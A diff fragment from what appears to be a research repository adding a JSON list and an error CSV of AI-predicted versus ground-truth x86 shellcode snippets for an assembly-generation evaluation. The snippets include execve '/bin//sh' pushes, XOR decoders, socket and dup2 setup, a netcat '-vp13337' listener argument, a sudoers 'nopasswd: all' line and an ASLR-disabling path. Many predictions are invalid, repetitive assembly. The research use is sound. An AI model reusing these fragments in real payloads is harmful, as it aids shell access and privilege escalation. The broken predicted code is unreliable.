0x69622f \\n push 0x69622f", + "sub eax, 20000h", + "section \\n uninitialized: db 0x68732f2f \\n db 0x6e69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f2f \\n db 0x69622", + "pop cx", + "push 0x6475732f \\n push 0x6374652f \\n mov eax, esp", + "mov ecx, args", + "cmp al, 0xf2", + "db '0c6h'", + "cmp eax, eax \\n jne 0x8", + "xor ax, 0x3041", + "jz _decode", + "pop ecx \\n pop stak \\n mov edi, esp", + "add eax, ebx", + "push 0x2f2f2f2f \\n mov esi, esp", + "backup al", + "push host_sockfd", + "find_address:", + "shl edx, 9", + "_dup2:", + "_three:", + "jmp short esp", + "push byte 10", + "_wrap_around:", + "cmp bl, 78h \\n jge loc_402B1D", + "_start: \\n jmp short enc", + "push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f", + "read_label:", + "mov bl, byte [edi]", + "db '/bin/sh'", + "_ priv_setgid:", + "xor edx, edx", + "mov: \\n =: \\n var2: \\n sys_listen: \\n bl:", + "mov ecx, ptr", + "ebx:", + "xor edx, edx \\n push edx", + "xor bl, 0xaa \\n jnz encodedshellcode", + "xor edx, edx", + "push 0x6374652f \\n mov esi, esp", + "push byte 0x2 \\n pop eax", + "sub ecx, ecx", + "xor edx, edx \\n mov byte [edx], 5", + "jmp short _stage", + "sub ax, 1564", + "shell_ret:", + "push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n", + "cmp byte [buff], 7ah", + "push 0x67513231", + "push 0x68732f2f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x", + "push 0x10", + "mov edx, eax", + "message db 'hello world!'", + "mov sys_read, esp", + "db 'egg mark'", + "xor edx, edx", + "jmp short push_cmd", + "decode:", + "xor cl, 0x32", + "cmp bl, 0xbb \\n jge xordecode \\n jmp notdecode", + "push [\\n pop ebp-4 \\n pop] \\n pop ebx", + "push byte +0x68", + "mov cx, 0700", + "edx:", + "mov al, 0xcd", + "xor cl, 0xaa", + "cmp al, 0xf2", + "mov al, 0x68732f2f \\n int 0x68732f \\n int 0x6e69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x6e69622f", + "push ecx \\n mov ecx, 15", + "xchg eax, ebx", + "push byte 16 \\n pop eax", + "mov eax, [esi+26]", + "push proc/sys/kernel/randomize_va_space \\n push eax \\n mov ebx, esp", + "mov bl, 0x2", + "push '-vp13337'", + "push 0x2f2f2f2f", + "push [\\n pop esi +4", + "cmp dword [edi], eax", + "mov ecx, esp", + "mov eax, byte [ebx+8]", + "bound ebx, 0x68732f2f, 0x6e69622f, 0x69622f, 0x69622f, 0x69622f, 0x69622f, 0x69622f, 0x69622f, 0x69622f, 0x69622f, 0x69622f, 0x69622f, 0x69622f", + "push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f", + "mov breakpoint, esp", + "xor ecx, ecx \\n xor eax, eax \\n xor edx, edx", + "push sizeof(struct", + "cmp bl, 0xaa \\n jz shellcode", + "push edx \\n mov ecx, esp", + "pop bl", + "xor eax, eax \\n xor edx, edx", + "mov al, __nr_fork", + "cmp ecx, ebp", + "xchg esi, esp", + "push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2", + "push 0x6d726574", + "push sys \\n push for \\n push dup2 \\n mov al, 0x68732f2f \\n mov dup2, 0x6e69622f \\n mov for, 0x69622f \\n mov dup2, 0x69622f \\n mov dup2, 0x69622f \\n mov for, 0x69622f2f \\n mov dup2, 0x69622f \\n mov dup2, 0x69622f \\n mov for, 0x69622f", + "jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero6e69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f", + "cmp al, ecx \\n jz found \\n inc ecx", + "mov bl, 5", + "int 0x80", + "for: dd 0x68732f \\n dd 0x68732f \\n dd 0x6e69622f \\n dd 0x69622f \\n dd 0x69622f \\n dd 0x69622f \\n dd 0x69622f \\n dd 0x69622f \\n dd 0x69622f \\n dd 0x69622f \\n dd 0x69622f \\n dd 0x69622f \\n dd 0x69622f \\n dd 0x6", + "push edx", + "push ' in/c'", + "xor ebx, ebx \\n mov eax, eax", + "pop esi", + "push 0x68732f2f \\n push 0x6e69622f", + "push ebx", + "xchg ecx, ebx", + "mov ecx, eax \\n push ecx", + "add ax, bx", + "decode:", + "push byte 0x77", + "mov ebx, esp", + "push 0-term \\n push daeh \\n push rsu/ on", + "push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f", + "xor 0xffffffff, 0xffffffff \\n xor eax, eax", + "add al, 0x3b", + "mov esi, al", + "mov eax, 1", + "push edx", + "int 0x80", + "entrypoint:", + "mov dl, 0x1c", + "sub ecx, 20h", + "push ecx", + "mov ebx, esp", + "mov edi, 0x3734b117", + "xor byte [esi + ecx - 1], bh", + "sub byte [esi], 13", + "push eax(socket", + "mov edx, esp", + "mov [ebx + 8], ebx", + "push 0x2 \\n pop ecx", + "lea edx, [esi+0x10]", + "mov byte [esi], 0x68732f2f \\n mov byte [esi], 0x68732f \\n mov byte [esi], 0x6e69622f \\n mov byte [esi], 0x69622f \\n mov byte [esi], 0x69622f \\n mov byte [esi], 0x6e69622f \\n mov byte [esi], 0x69622f2f \\n mov byte [esi], 0x69622f", + "push byte 0x68732f2f \\n push byte 0x68732f \\n push byte 0x6e69622f \\n push byte 0x69622f \\n push byte 0x69622f \\n push byte 0x69622f \\n push byte 0x69622f \\n mov uninitialized, esp", + "xor cl, 0xAA \\n jz shift_decode", + "xor eax, 0x68732f2f \\n xor eax, 0x68732f \\n xor eax, 0x6e69622f \\n xor eax, 0x69622f \\n xor eax, 0x69622f \\n xor eax, 0x69622f \\n xor eax, 0x69622f \\n xor eax, 0x69622f2f \\n xor eax, 0x69622f2f \\n xor eax, 0x69622f", + "decoded_shellcode: \\n call stack", + "mov eax, 0x68732f2f \\n mov eax, 0x68732f \\n mov eax, 0x6e69622f \\n mov eax, 0x69622f \\n mov eax, 0x69622f \\n mov eax, 0x69622f \\n mov eax, 0x6e69622f \\n mov eax, 0x69622f \\n mov eax, 0x69622f2f \\n mov eax, 0x69622f", + "cmp ax, bx \\n jne while", + "format:", + "mul ebx", + "push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n mov edi, esp", + "push edx", + "L4: \\n jmp short stack", + "push dword 0x8140a8c0", + "mov esi, 10", + "jmp short _setup", + "push 0x6e69622f \\n push 0x7273752f \\n mov ebx, esp", + "xor until, until \\n sub until, 0x68732f2f \\n sub until, 0x6e69622f \\n xor until, 0x69622f \\n xor until, 0x69622f \\n xor until, 0x69622f \\n xor until, 0x69622f \\n xor until, 0x69622f \\n xor until, 0x69622f \\n xor until, 0x69622f \\n xor until, 0x", + "mov eax, edx", + "call _myfunc", + "sub byte [esi], 0xd", + "push edx", + "cmp ecx, 5", + "jns decode_pr", + "_zero1e:", + "call sys_read", + "push ecx \\n push cotent \\n push 'hsab' \\n push '/nib' \\n push '////'", + "inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc istruction \\n inc istruction \\n inc istruction \\n inc istruction \\n inc pf", + "xor eax, eax \\n xor edx, edx", + "D2: \\n not byte [esi]", + "xor eax, eax", + "_write:", + "inc cl \\n inc cl", + "mov esi, 0x353ffc3b", + "mov ecx, edx", + "inc ebx", + "push 0x78", + "mov ecx, esp", + "xor ah, ah", + "_load_data:", + "push ebx \\n push esi", + "test eax, eax \\n jz checkforfile", + "push edx", + "mov cl, 2", + "rol edx, 4", + "mov edi, ecx", + "mov edi, edi", + "xor ebx, ebx \\n xor eax, eax", + "push byte 67 \\n pop eax", + "mov esi, eax", + "push ebx", + "mov dl, 0x02", + "mov edi, [esi]", + "sub ebx, 0x2e2aa163", + "xor bx, bx", + "F2: \\n call function1", + "xor ecx, ecx \\n mul ecx", + "test efault, efault \\n jmp next_page", + "init:", + "div edx", + "mov eax, [x]", + "cmp eax, ebx \\n jne all", + "push 0x68732f2f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n mov my_table, esp", + "push 0x706d742f", + "mov ax, 1", + "mov al, 5", + "cmp eax, dword [edi] \\n not dword [edi]", + "pop that", + "mov al, dl", + "sub var2, esi", + "sub ecx, 23", + "push edi \\n mov eax, esp", + "test eax, eax \\n jz write", + "mov ebx, edx+0x4", + "cmp [ebp+var_a], 0", + "push 1", + "word1: db 65535", + "sub cx, cx", + "mov eax, 0x68732f2f \\n int 0x6e69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x6e69622f \\n int 0x69622f \\n int 0x6e69622f \\n int 0x6e69622f \\n int 0x6e69622f \\n int 0x", + "incpage:", + "push word 0x632d \\n mov edi, esp", + "push ecx", + "test eax, eax \\n jns _while_loop", + "mov ecx, esp", + "edx: \\n dword ptr 0x68732f2f \\n dword ptr 0x68732f \\n dword ptr 0x6e69622f \\n dword ptr 0x69622f \\n dword ptr 0x69622f \\n dword ptr 0x69622f \\n dword ptr 0x69622f \\n dword ptr 0x69622f \\n dword ptr 0x69622f \\n dword ptr 0x69622f \\n dword ptr 0x696", + "jz _encodedshellcode", + "me:", + "push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f", + "xor ecx, ecx \\n mul ecx", + "sub eax, ebx", + "push 0x3 \\n pop bl", + "cmp al, 0xf2 \\n jge _start", + "lea ecx, [esi+8]", + "xor ebx, ebx", + "mov ax, 1666", + "mov ebx, esp", + "push dword 0x61722f6c", + "cmp cl, 0x11 \\n jl 0xff \\n add dl, 0x5", + "loop l4 \\n mov edx, esp", + "mov cl, 4", + "loop decode \\n jmp Shellcode", + "xchg eax, ebx", + "cmp byte [esi], 0xD \\n jl wrap_around", + "mov [esi+1], dl", + "push 63 \\n pop 63", + "push 0xdebf", + "section", + "mov byte [eax], 15", + "push edx", + "push dword 0x2f2f2f2f \\n push dword 0x7273752f \\n mov ebx, esp", + "mov ecx, esp", + "push 0x69622f3a", + "push eax", + "mov eax, msg1", + "push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n mov ecx, esp", + "mov dword [0x732f636f], 0x732f636f", + "push 0x6873732f \\n push 0x6374652f \\n mov edx, esp", + "inc esi", + "mov esi, eax", + "cmp ax, cl", + "cmp ebx, eax", + "section .data, _start", + "dec dl", + "jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero6e69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f", + "mov eax, 0x68732f2f \\n mov eax, 0x6e69622f", + "sub 0x7f, 0x7f", + "push 0x706d742f", + "xor byte [esi], 0x97", + "mov al, 0x68732f2f \\n mov al, 0x6e69622f", + "inc ebx", + "xor eax, eax", + "push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n mov ax, esp", + "xor eax, eax \\n xor ebx, ebx", + "push 0x706d742f", + "mov ecx, read-write", + "loop ecx \\n xor var1, var1 \\n xor unless, unless \\n xor decrementing, decrementing", + "push dword eax", + "shellcode:", + "not eax", + "mov dword [[], 0x6374652f", + "push 0x7461632f \\n push 0x6e69622f \\n mov edx, esp", + "push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f", + "mul 32-bit", + "push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n mov ebx, esp", + "push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n mov rcx, esp", + "mov cx, 0x401", + "cmp bh, al", + "push 0x7665642f", + "jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero6e69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f", + "jge write", + "mov ecx, 4294948047", + "push setgid \\n pop = \\n pop 0x2e", + "push trasnfer \\n pop ecx", + "jmp short stage", + "cmp loc_402b13, loc_402b13 \\n je loc_402b13", + "push byte 0x68732f2f \\n push byte 0x6e69622f \\n push byte 0x69622f \\n push byte 0x69622f \\n push byte 0x69622f \\n mov ebx, esp", + "pop ecx", + "push byte 0x50905090 \\n push 0x50905090 \\n push 0x50905090 \\n push 0x50905090 \\n push 0x50905090 \\n push 0x50905090 \\n push 0x50905090 \\n push 0x509050905090 \\n push 0x509050905090 \\n push 0x509050905090 \\n push 0x509050905090 \\n push 0x5090509050905090 \\n push 0x5090", + "push byte 0x1 \\n pop edx", + "shellcode: db 0x4b,0xf7,0x13,0x59,0xcc,0x8c,0x63,0x5e,0x9f,0x8d,0x99,0x9f,0x1f,0xa4,0x3b,0x6e,0xc6,0x36,0x23", + "pop ecx", + "jmp code", + "jz download", + "push sys_connect \\n pop = \\n pop ebx", + "mov esi, esp", + "cmp eax, ebx \\n je _exit", + "push dword eax", + "add byte [esi], 0x02", + "mov zero_reg, [[]", + "push edx \\n push esi \\n push edi \\n push ebx \\n mov ecx, esp", + "pop eax", + "_zero1b:", + "mov eax, 0x68732f2f \\n int 0x68732f \\n int 0x6e69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x69622f", + "jmp short formatting", + "xchg ebx, eax", + "jmp edi", + "xor eax, eax \\n mul eax", + "xor ax, 0x539", + "sub eax, 8", + "push 0x61622f6e", + "push dx", + "mov ecx, esp", + "notdecode:", + "jmp read", + "push word 0x776f", + "push ' -le///sh//sh'", + "child:", + "mov edx, response", + "cmp DWORD [eax], edi \\n jne l1", + "mov esi, 0x353ffc3b", + "ip equ 0x0100007f", + "lea edx, [ebx+12]", + "mov esi, word [esi]", + "xor eax, eax \\n xor ebx, ebx \\n xor ecx, ecx \\n xor edx, edx", + "add edx, 32", + "xor eax, eax \\n xor ebx, ebx \\n xor ecx, ecx \\n xor edx, edx", + "mov dl, byte [esi+1]", + "push __nr_execve \\n pop eax", + "mov eax, value -1 \\n not eax", + "mov bl, 3 \\n dec bl \\n jnz l3", + "jmp shellcode", + "push byte 0x8 \\n pop 0x8", + "shr bl, 4", + "push 0x746f6f72", + "xor eax, eax \\n mov numebr, esp", + "jge exi", + "mov ecx, 0x1", + "mov eax, [ebx+esi*2+4]", + "_start: \\n jmp short call_shellcode", + "mov edx, 0x65676760", + "xor ecx, ecx", + "dec eax", + "_file_label:", + "int 80h", + "push dword 0x3a303a3a", + "cmp al, 2 \\n jne do_inject", + "mov mm3, \"shellcode\"", + "jne exit", + "mov byte [edi], bl", + "xchg edi, eax", + "push edx \\n push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x" +] \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/Errors GenEXE.csv b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/Errors GenEXE.csv new file mode 100644 index 0000000000000000000000000000000000000000..1c4105a6d098ff2e9b6da8a8c251b9c990d2956b --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/Errors GenEXE.csv @@ -0,0 +1,208 @@ +Ground Truth Snippets ErrorGENEXE;Predicted Snippets ErrorGENEXE +push 0x6d6f632e \\n push 0x656c676f \\n push 0x6f672031 \\n push 0x2e312e31 \\n push 0x2e373231;push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f +xor eax, eax \\n xor ebx, ebx;xor eax, eax \\n mul eax +sub bl, al;sub al, bl +int 0x80;mov al, 0x68732f2f \\n int 0x6e69622f +pop esi;mov esi, esp +section .bss;section . +mov eax, [y];mov eax, y +get:;get_label: +zerod:;_zerod: +mov al, [byte_tbl+2];mov al, byte_tbl+2 +mov ebx, [y];mov ebx, y +duploop:;duploop_label: +inc esi \\n inc esi;inc esi \\n inc esi \\n inc esi \\n inc esi +int 80h;int 0x80 +push edx;push edx \\n push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x +next_addr:;_next_addr: +inc ax;add ax, 1 +push 0x65782e2f \\n push 0x706d742f;push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f +sub eax, eax;xor eax, eax +push word 0x0a;push af_inet6 +db 'all all=(all) nopasswd: all', 0xa;db 'all all=(all) nopasswd: all' +mov[esi+39], ebx;pop ebx +zero1a:;_zero1a: +cmp edx, 0x43 \\n ja loop \\n push edx;cmp edx, 0x43 \\n jge loop \\n push edx +section .text;section +push word 0x3582;push word 0x68732f2f \\n push word 0x6e69622f \\n push word 0x69622f \\n push word 0x69622f +mov bl, 0x01;mov bl, sys_socket +xor byte [esi+1], dl;xor [esi], dl +cmp cl, dl \\n je encodedshellcode;cmp cl, dl \\n je _encodedshellcode +lea ecx, [esp];mov ecx, esp +xor eax,eax \\n xor ebx,ebx;xor eax, eax \\n mul eax +sub eax, [esp];sub eax, esp +cmp cl, 0xff \\n jne dup2;cmp cl, 0xff, \\n jne _dup2 +call [esp];int 0x80 +mov edx, eax;xchg edx, eax +call write;jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero6e69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f +xchg ebx, eax;xchg eax, ebx +mov ecx, esp;mov ecx, [args] +lea ecx, [esp];mov ebx, esp +mov cl, len;mov cl, 0x68732f2f \\n add cl, 0x68732f \\n add cl, 0x6e69622f \\n add cl, 0x69622f \\n add cl, 0x69622f \\n add cl, 0x69622f \\n add cl, 0x69622f \\n add cl, 0x6e69622f \\n add cl, 0x6e69622f \\n add cl, 0x69622f2f \\n add cl, 0x6 +mov al, 11 \\n int 0x80;int 0x80 +jmp edi;jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero6e69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f +jae _start-0x24;jns _start-0x24 +push 0x2;push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f +mov [1000h], ax;mov ax, 1000h +mov ebx, type var3;mov ebx, var3 +open:;open_label: +switch:;_switch: +mov byte al, 0xa4;mov al, byte [0xa4] +push 0xb \\n pop eax;push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n mov eax, esp +mov al, 0xb \\n int 0x80;mov al, 0x68732f2f \\n int 0x68732f \\n int 0x6e69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x6e69622f +cmp BYTE al, 2 \\n je do_inject \\n jmp while;cmp al, 2 \\n jne while \\n jmp do_inject +push 0x10;push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f +mov al, 0x58;push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n mov ebx, esp +xor eax, eax \\n push eax;push edx +cmp eax, ebx \\n je child;cmp eax, ebx \\n jne child +decoder: \\n pop esi \\n mov edi, esi;pop esi \\n mov edi, [esi] +mov eax, 63;mov eax, 0x68732f2f \\n int 0x68732f \\n int 0x6e69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x69622f +mov al,0xa2 \\n int 80h;int 0x80 +stage:;_stage: +mov byte [esi], dl;mov dl, byte [esi] +xor eax, [edi];xor eax, edi +cmp BYTE [esi], 0x7 \\n jle lowbound;cmp BYTE [esi], 0x7 \\n jl lowbound +push 0x2;push for \\n push af_inet +push esi;push sockfd +close:;close_label: +pop ecx \\n loop l1 \\n mov eax, 1;pop ecx \\n dec ecx \\n jmp l1 +mov al, 0x01;mov byte [eax], 0x1 +mov edi, 0x978cd092 \\n mov ebx, edi;push 0x978cd092 \\n pop edi \\n pop ebx +lea ebx, [esp];mov ebx, esp +loop bucle;dec ecx \\n jns bucle +jns loop2;jns _loop2 +cmp cl, 0x11 \\n jb 0xff \\n add dl, 0x5;cmp cl, 0x11 \\n add dl, 0x5 +mov byte [esp], 0x2f;mov byte [var1], 0x2f +xor ebx, ebx \\n xor edx, edx;xor ebx, ebx \\n mul ebx +xor ecx, ecx \\n mul ecx;xor eax, eax \\n xor ecx, ecx +function_5: \\n call [esp];function_5: \\n int 0x80 +xchg esi, eax;mov esi, esp +xor edx, edx \\n push edx;push edx +sub ecx,ecx \\n push ecx;xor ecx, ecx \\n push ecx +mov al,0x6;mov al, 0x68732f2f \\n mov al, 0x68732f \\n mov al, 0x6e69622f \\n mov al, 0x69622f \\n mov al, 0x69622f \\n mov al, 0x69622f \\n mov al, 0x69622f \\n mov al, 0x6e69622f \\n mov al, 0x69622f \\n mov al, 0x6e69622f \\n mov al, 0x69622 +push eax;push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f +section .bss;section \\n uninitialized: db 0x68732f2f \\n db 0x6e69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f2f \\n db 0x69622 +mov ecx, esp;mov ecx, args +db 0c6h;db '0c6h' +jnz decode;jz _decode +push ecx;push host_sockfd +dup2:;_dup2: +three:;_three: +L1: \\n jmp short esp;jmp short esp +wrap_around:;_wrap_around: +cmp bl, 78h \\n jge short loc_402B1D;cmp bl, 78h \\n jge loc_402B1D +push word 0x5c11;push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f +read:;read_label: +sub edx, edx;xor edx, edx +cdq \\n push edx;xor edx, edx \\n push edx +xor bl, 0xaa \\n jne encodedshellcode;xor bl, 0xaa \\n jnz encodedshellcode +xor edx, edx \\n mov dl, 5;xor edx, edx \\n mov byte [edx], 5 +jmp short stage;jmp short _stage +push 2;push 0x68732f2f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x +push eax \\n pop edx;mov edx, eax +message: db 'hello world!';message db 'hello world!' +cmp bl, 0xbb \\n je xordecode \\n jmp notdecode;cmp bl, 0xbb \\n jge xordecode \\n jmp notdecode +mov al, 11;mov al, 0x68732f2f \\n int 0x68732f \\n int 0x6e69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x6e69622f +push 15 \\n mov ecx, esp;push ecx \\n mov ecx, 15 +mov long [esi+26], eax;mov eax, [esi+26] +push 0x37333333 \\n push 0x3170762d;push '-vp13337' +scasd;cmp dword [edi], eax +push ebx;push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f +cmp bl, 0xaa \\n je shellcode;cmp bl, 0xaa \\n jz shellcode +mov al,2;mov al, __nr_fork +xchg esp, esi;xchg esi, esp +push dword ebx \\n push dword ebx;push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 +call decoder;jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero6e69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f +marks dw 0, 0, 0, 0;for: dd 0x68732f \\n dd 0x68732f \\n dd 0x6e69622f \\n dd 0x69622f \\n dd 0x69622f \\n dd 0x69622f \\n dd 0x69622f \\n dd 0x69622f \\n dd 0x69622f \\n dd 0x69622f \\n dd 0x69622f \\n dd 0x69622f \\n dd 0x69622f \\n dd 0x6 +push eax;push edx +sub eax, 0x013ffeff \\n push eax;push ' in/c' +xor ebx, ebx \\n mov ebx, eax;xor ebx, ebx \\n mov eax, eax +mov al, 102 \\n int 80h;push 0x68732f2f \\n push 0x6e69622f +xchg ebx, ecx;xchg ecx, ebx +lea ebx, [esp];mov ebx, esp +push ebx;push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f +xor ebx, ebx \\n push ebx;push edx +push eax \\n mov edx, esp \\n push ebx \\n mov ecx, esp \\n mov al, 0xb \\n int 0x80;int 0x80 +sub byte [ebp+ecx],20h;sub ecx, 20h +xor byte [esi + ecx - 1], 0x3;xor byte [esi + ecx - 1], bh +mov edx, ecx;mov edx, esp +mov eax, 19;mov byte [esi], 0x68732f2f \\n mov byte [esi], 0x68732f \\n mov byte [esi], 0x6e69622f \\n mov byte [esi], 0x69622f \\n mov byte [esi], 0x69622f \\n mov byte [esi], 0x6e69622f \\n mov byte [esi], 0x69622f2f \\n mov byte [esi], 0x69622f +xor cl, 0XAA \\n jz shift_decode;xor cl, 0xAA \\n jz shift_decode +nop;xor eax, 0x68732f2f \\n xor eax, 0x68732f \\n xor eax, 0x6e69622f \\n xor eax, 0x69622f \\n xor eax, 0x69622f \\n xor eax, 0x69622f \\n xor eax, 0x69622f \\n xor eax, 0x69622f2f \\n xor eax, 0x69622f2f \\n xor eax, 0x69622f +decoded_shellcode: \\n call [esp];decoded_shellcode: \\n call stack +mov eax, 90;mov eax, 0x68732f2f \\n mov eax, 0x68732f \\n mov eax, 0x6e69622f \\n mov eax, 0x69622f \\n mov eax, 0x69622f \\n mov eax, 0x69622f \\n mov eax, 0x6e69622f \\n mov eax, 0x69622f \\n mov eax, 0x69622f2f \\n mov 